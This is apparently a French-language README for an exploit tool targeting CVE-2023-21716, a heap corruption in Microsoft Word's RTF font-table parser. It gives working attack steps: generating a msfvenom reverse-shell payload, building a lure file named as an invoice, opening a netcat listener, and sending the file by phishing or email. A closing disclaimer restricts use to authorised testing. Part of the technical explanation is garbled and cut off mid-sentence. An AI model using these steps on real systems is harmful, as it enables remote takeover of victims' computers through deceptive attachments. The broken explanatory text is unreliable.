
CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload
Gravité : Critique (CVSS 9.8)
Affecté : Microsoft Word 2013 / 2016 / 2019 / 2021 (non corrigé)
Correctif : Mardi des correctifs Microsoft février 2023
Auteur : REGGYRAIDER
CVE-2023-21716 est une vulnérabilité de corruption du tas dans l'analyseur RTF de Microsoft Word (wwlib.dll).
Lorsque Word analyse une directive \fonttbl contenant plus de 32 767 entrées de police, un compteur signé 16 bits interne dépasse, corrompant les métadonnées du tas. Cela permet à un attaquant d'atteindre une exécution de code à distance simplement en envoyant à la victime un fichier .rtf malveillant.
Aucune macro. Aucune interaction utilisateur au-delà de l'ouverture du fichier.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716
python3 exploit.py payload.bin invoice_march2024.rtf
nc -lvnp 4444
Télécharger via SMB, pièce jointe email, ou tout vecteur de phishing.
Lorsque la victime ouvre invoice_march2024.rtf dans un Word non corrigé, vous recevez un shell inversé.
Attacker creates RTF Word parses \fonttbl Heap corrupted
───────────────────── ──► ────────────────────── ──► ──────────────
\fonttbl with 32769+ Signed 16-bit counter Attacker's
font definitions overflows → 0x8000 shellcode runs
\f<N> dans \fonttbl.payload.bin) est placé dans \pict et atterrit dans la région corrompue, obtenant l'exécution lorsque l'allocateur le traite.Cet outil est destiné uniquement à des fins éducatives et à des tests de pénétration autorisés.
Utiliser cet exploit contre des systèmes dont vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite pour tester est illégal.
L'auteur décline toute responsabilité en cas d'utilisation abusive.